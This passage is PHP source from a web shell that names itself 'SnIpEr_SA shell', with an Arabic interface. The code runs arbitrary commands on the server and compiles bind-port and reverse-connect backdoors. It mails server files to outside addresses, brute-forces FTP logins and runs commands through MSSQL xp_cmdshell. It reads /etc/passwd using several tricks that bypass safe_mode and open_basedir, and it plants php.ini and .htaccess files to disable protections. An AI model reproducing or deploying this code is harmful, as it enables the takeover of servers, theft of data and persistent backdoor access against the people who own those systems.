echo "<br>".ws(2)."المساحة الخاليه : <b>".view_size($free)."</b> المساحة الكلية: <b>".view_size($all)."</b>";
echo "</b><br>".ws(2);
echo "Register globals: <b>";
$reg_g = @ini_get("register_globals");
if($reg_g){
echo "<font color=#008000>فعال</font>"; } else { echo "<font color=red>غير فعال</font>"; }
echo "</b>".ws(2);
echo "open_basedir: <b>";
$openbasedi = @ini_get("open_basedir");
if($openbasedi){
echo "<font color=red>فعال</font>"; } else { echo "<font color=#008000>غير فعال</font>"; }
echo "</b>".ws(2);
echo '</font></td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc>
<tr><td align=right width=100>';
echo $font;
if($unix){
echo '<font color=#990000><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=tahoma size=-2 color=#cccccc><b>";
echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
echo ws(3).$sysctl."<br>";
echo ws(3).ex('echo $OSTYPE')."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
if(!empty($id)) { echo ws(3).$id."<br>"; }
else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
{
$euserinfo = @posix_getpwuid(@posix_geteuid());
$egroupinfo = @posix_getgrgid(@posix_getegid());
echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
}
else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
echo ws(3).$dir;
echo ws(3).'( '.perms(@fileperms($dir)).' )';
echo "<br>";
echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
echo "</b></font>";
}
else
{
echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
echo "</td><td>";
echo "<font face=tahoma size=-2 color=red><b>";
echo ws(3).@substr(@php_uname(),0,120)."<br>";
echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
echo ws(3).@getenv("USERNAME")."<br>";
echo ws(3).$dir;
echo "<br>";
echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
echo "<br></font>";
}
echo "</font>";
echo "</td></tr></table>";
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
{
$res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
err(6+$res);
$_POST['cmd']="";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
{
if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
else
{
$filename = @basename($_POST['loc_file']);
$filedump = @fread($file,@filesize($_POST['loc_file']));
fclose($file);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
$attach = array(
"name"=>$filename,
"type"=>$mime_type,
"content"=>$filedump
);
if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
$res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
err(6+$res);
$_POST['cmd']="";
}
}
if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
{
$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
{
switch($_POST['what'])
{
case 'own':
@chown($_POST['param1'],$_POST['param2']);
break;
case 'grp':
@chgrp($_POST['param1'],$_POST['param2']);
break;
case 'mod':
@chmod($_POST['param1'],intval($_POST['param2'], 8));
break;
}
$_POST['cmd']="";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
{
switch($_POST['what'])
{
case 'file':
if($_POST['action'] == "create")
{
if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
else {
fclose($file);
$_POST['e_name'] = $_POST['mk_name'];
$_POST['cmd']="edit_file";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
}
}
else if($_POST['action'] == "delete")
{
if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
$_POST['cmd']="";
}
break;
case 'dir':
if($_POST['action'] == "create"){
if(mkdir($_POST['mk_name']))
{
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
}
else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
}
else if($_POST['action'] == "delete"){
if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
$_POST['cmd']="";
}
break;
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
{
if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
else {
echo $table_up3;
echo $font;
echo "<form name=save_file method=post>";
echo ws(3)."<b>".$_POST['e_name']."</b>";
echo "<div align=center><textarea name=e_text cols=121 rows=24>";
echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
fclose($file);
echo "</textarea>";
echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
echo "<input type=hidden name=dir value=".$dir.">";
echo "<input type=hidden name=cmd value=save_file>";
echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
echo "</div>";
echo "</font>";
echo "</form>";
echo "</td></tr></table>";
exit();
}
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
{
$mtime = @filemtime($_POST['e_name']);
if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
else {
if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
@fwrite($file,$_POST['e_text']);
@touch($_POST['e_name'],$mtime,$mtime);
$_POST['cmd']="";
echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
}
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
{
cf("/tmp/bd.c",$port_bind_bd_c);
$blah = ex("gcc -o /tmp/bd /tmp/bd.c");
@unlink("/tmp/bd.c");
$blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
$_POST['cmd']="ps -aux | grep bd";
$_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['port1']))
{
cf("bds",$port_bind_bd_cs);
$blah = ex("chmod 777 bds");
$blah = ex("./bds ".$_POST['port1']." &");
$_POST['cmd']="echo \"Now script install backdoor connect to port ";
}else{
cf("/tmp/bds",$port_bind_bd_cs);
$blah = ex("chmod 777 bds");
$blah = ex("./tmp/bds ".$_POST['port1']." &");
}
if (!empty($_POST['php_ini1']))
{
cf("php.ini",$php_ini1);
$_POST['cmd']=" لايقاف السيف مود php.ini تم زرع ملف";
}
if (!empty($_POST['htacces']))
{
cf(".htaccess",$htacces);
$_POST['cmd']="لإيقاف المود سكيورتي htaccess تم زرع ملف";
}
if (!empty($_POST['file_ini']))
{
cf("ini.php",$sni_res);
$_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? كالتالي ss بالمتغير ini.php الأن قم بعمل انكلود لملف";
}
if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK.
(".$sizef."ê?)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT
OK</div></center>";
}
}
if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
{
cf("/tmp/bdpl",$port_bind_bd_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
$_POST['cmd']="ps -aux | grep bdpl";
$_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/back",$back_connect);
$p2=which("perl");
$blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...Datached\"";
}
if (!empty($_POST['ips']) && !empty($_POST['ports']))
{
cf("/tmp/backs",$back_connects);
$p2=which("perl");
$blah = ex($p2." /tmp/backs ".$_POST['ips']." ".$_POST['ports']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ips']." port ".$_POST['ports']." ...\"";
}
if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
{
cf("/tmp/back.c",$back_connect_c);
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
$_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
{
cf("/tmp/dp",$datapipe_pl);
$p2=which("perl");
$blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
$_POST['cmd']="ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
{
cf("/tmp/dpc.c",$datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
$_POST['cmd']="ps -aux | grep dpc";
}
if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
if (!empty($HTTP_POST_FILES['userfile']['name']))
{
if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
@copy($HTTP_POST_FILES['userfile']['tmp_name'],
$_POST['dir']."/".$nfn)
or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
}
if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
{
switch($_POST['with'])
{
case wget:
$_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
break;
case fetch:
$_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
break;
case lynx:
$_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case links:
$_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case GET:
$_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
break;
case curl:
$_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
break;
}
}
if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); }
else
{
if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
else
{
if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']); }
if($_POST['cmd']=="ftp_file_up") { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']); }
}
}
@ftp_close($connection);
$_POST['cmd'] = "";
}
if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
{
list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
if(empty($ftp_port)) { $ftp_port = 21; }
$connection = @ftp_connect ($ftp_server,$ftp_port,10);
if(!$connection) { err(3); $_POST['cmd'] = ""; }
else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
@ftp_close($connection);
}
echo $table_up3;
if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
if ($method=="file") {
if (@file($file)) {
$filer = file($file);
foreach ($filer as $a) { echo $a; }
} else {
echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
}
}
if ($method=="fread") {
if (@fopen($file, 'r')) {
$fp = fopen($file, 'r');
$string = fread($fp, filesize($file));
echo "<pre>";
echo $string;
echo "</pre>";
} else {
echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
}
}
if ($method=="show_source") {
if (show_source($file)) {
echo "<pre>";
echo show_source($file);
echo "</pre>";
} else {
echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
}
}
if ($method=="readfile") {
echo "<pre>";
if (readfile($file)) {
//echo "<pre>";
//echo readfile($file);
echo "</pre>";
} else {
echo "</pre>";
echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
}
}
function dozip1($link,$file)
{
$fp = @fopen($link,"r");
while(!feof($fp))
{
$cont.= fread($fp,1024);
}
fclose($fp);
$fp2 = @fopen($file,"w");
fwrite($fp2,$cont);
fclose($fp2);
}
if (isset($_POST['funzip']))
{
dozip1($_POST['funzip'],$_POST['fzip']);
}
if(empty($_POST['root'])){
} else {
$root = $_POST['root']; }
$c = 0; $D = array();
set_error_handler("eh");
$chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
for($i=0; $i < strlen($chars); $i++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
$prevD = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD){
for($j=0; $j < strlen($chars); $j++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
$prevD2 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD2){
for($p=0; $p < strlen($chars); $p++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
$prevD3 = $D[count($D)-1];
glob($path."*");
if($D[count($D)-1] != $prevD3){
for($r=0; $r < strlen($chars); $r++){
$path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
glob($path."*");
}
}
}
}
}
}
}
$D = array_unique($D);
foreach($D as $item)
if(isset($_REQUEST['root']))
echo "{$item}\n";
function eh($errno, $errstr, $errfile, $errline){
global $D, $c, $i;
preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
if($o){ $D[$c] = $o[2]; $c++;}
}
if($safe_mode)
{
switch($_POST['cmd'])
{
case 'safe_dir':
$d=@dir($dir);
if ($d)
{
while (false!==($file=$d->read()))
{
if ($file=="." || $file=="..") continue;
@clearstatcache();
list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
if(!$unix){
echo date("d.m.Y H:i",$mtime);
if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size);
}
else{
$owner = @posix_getpwuid($uid);
$grgid = @posix_getgrgid($gid);
echo $inode." ";
echo perms(@fileperms($file));
printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
echo date("d.m.Y H:i ",$mtime);
}
echo "$file\n";
}
$d->close();
}
else echo $lang[$language._text29];
break;
}
}
else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
$cmd_rep = ex($_POST['cmd']);
if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
else { echo @htmlspecialchars($cmd_rep)."\n"; }}
if($_POST['cmd'])
{
switch($_POST['cmd'])
{
case 'test1':
$ci = @curl_init("file://".$_POST['test1_file']."");
$cf = @curl_exec($ci);
echo $cf;
break;
case 'test2':
@include($_POST['test2_file']);
break;
case 'mysqlb':
$mhost = "localhost";
$muser = $_POST['test3_ml'];
$mpass = $_POST['test3_mp'];
$mdb = $_POST['test3_md'];
$file = $_POST['test3_file'];
// default mysql_read files [seperated by: ':']:
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
$sql = array (
"USE $mdb",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tbl LIMIT 1"
);
mysql_connect ($mhost, $muser, $mpass);
foreach ($sql as $statement) {
$q = mysql_query ($statement);
if ($q == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($q);
}
echo "</textarea>";
break;
case 'test4':
if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
$db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
if($db)
{
if(@mssql_select_db($_POST['test4_md'],$db))
{
@mssql_query("drop table SnIpEr_SA_temp_table",$db);
@mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
@mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
$res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
while(($row=@mssql_fetch_row($res)))
{
echo $row[0]."\r\n";
}
@mssql_query("drop table SnIpEr_SA_temp_table",$db);
}
else echo "[-] ERROR! Can't select database";
@mssql_close($db);
}
else echo "[-] ERROR! Can't connect to MSSQL server";
break;
case 'test5':
if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
$extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
@mb_send_mail(NULL, NULL, NULL, NULL, $extra);
$lines = file ('/tmp/mb_send_mail');
foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
break;
case 'test6':
$stream = @imap_open('/etc/passwd', "", "");
$dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
@imap_close($stream);
break;
case 'test7':
$stream = @imap_open($_POST['test7_file'], "", "");
$str = @imap_body($stream, 1);
echo $str;
@imap_close($stream);
break;
case 'test8':
if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
else echo $lang[$language.'_text119'];
break;
case 'cURL':
if(empty($_POST['SnIpEr_SA'])){
} else {
$curl=$_POST['SnIpEr_SA'];
$ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
echo "</textarea></CENTER>";
}
break;
case 'copy':
if(empty($snn)){
if(empty($_GET['snn'])){
if(empty($_POST['snn'])){
} else {
$u1p=$_POST['snn'];
}
} else {
$u1p=$_GET['snn'];
}
}
$u1p=""; // File to Include... or use _GET _POST
$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$snn, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
echo "</textarea></CENTER>";
}
break;
case 'ini_restore':
if(empty($_POST['ini_restore'])){
} else {
$ini=$_POST['ini_restore'];
echo ini_get("safe_mode");
echo ini_get("open_basedir");
require_once("$ini");
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GET["ss"]);
echo "</textarea></CENTER>";
}
break;
case 'glob':
function reg_glob()
{
$chemin=$_REQUEST['glob'];
$files = glob("$chemin*");
foreach ($files as $filename) {
echo "$filename\n";
}
}
if(isset($_REQUEST['glob']))
{
reg_glob();
}
break;
case 'zend':
if(empty($_POST['zend'])){
} else {
$dezend=$_POST['zend'];
include($_POST['zend']);
print_r($GLOBALS);
require_once("$dezend");
echo "</textarea></p>";
}
break;
case 'sym1':
if(empty($_POST['sym1p'])){
} else {
$symp=$_POST['sym1p'];
}
if(empty($_POST['sym1p2'])){
} else {
$symp2=$_POST['sym1p2'];
symlink("a/a/a/a/a/a/", "dummy");
symlink("dummy".$symp2."".$symp."", "xxx");
unlink("dummy");
while (1) {
symlink(".", "dummy");
}
}
break;
case 'sym2':
@include(xxx);
break;
case 'plugin':
if ($_POST['plugin'] ){
for($uid=0;$uid<60000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
}
break;
case 'command':
if (!empty($_POST['command'])) {
if ($method=="system") {
system($_POST['command']);
echo "Functions system";
}
if ($method=="passthru") {
passthru($_POST['command']);
echo "Functions passthru";
}
if ($method=="exec") {
$string = exec($_POST['command']);
echo $string;
echo "Functions exec";
}
if ($method=="shell_exec") {
$string = shell_exec($_POST['command']);
echo $string;
echo "Functions shell_exec";
}
if ($method=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
echo "Functions popen";
}
if ($method=="proc_open") {
$command = isset($_POST['command']) ? $_POST['command'] : '';
/* Load the configuration. */
/* Default settings --- these settings should always be set to something. */
/* Merge settings. */
session_start();
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($_POST['command'], $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $_POST['command']);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $_POST['command'] . "\n";
/* Initialize the current working directory. */
if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_POST['command'])) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_POST['command'], $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} elseif (trim($_POST['command']) == 'exit') {
logout();
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
}
/* Alias expansion. */
$length = strcspn($_POST['command'], " \t");
$token = substr($_POST['command'], 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($_POST['command'], $length);
$io = array();
$p = proc_open($_POST['command'],
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
}
}
break;
}
}
if ($_POST['cmd']=="ftp_brute")
{
$suc = 0;
foreach($users as $user)
{
$connection = @ftp_connect($ftp_server,$ftp_port,10);
if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
@ftp_close($connection);
}
echo "\r\n-------------------------------------\r\n";
$count = count($users);
if(isset($_POST['reverse'])) { $count *= 2; }
echo $lang[$language.'_text97'].$count."\r\n";
echo $lang[$language.'_text98'].$suc."\r\n";
}
if ($_POST['cmd']=="php_eval"){
$eval = @str_replace("<?","",$_POST['php_eval']);
$eval = @str_replace("?>","",$eval);
@eval($eval);}
if ($_POST['cmd']=="mysql_dump")
{
if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
else {
if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
else { echo "[-] ERROR! Can't write in dump file"; }
}
}
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";
function div_title($title, $id)
{
return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
}
function div($id)
{
if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
return '<div id="'.$id.'">';
}
if(!$safe_mode){
echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
echo $te.'</div>'.$table_end1.$fe;
}
else{
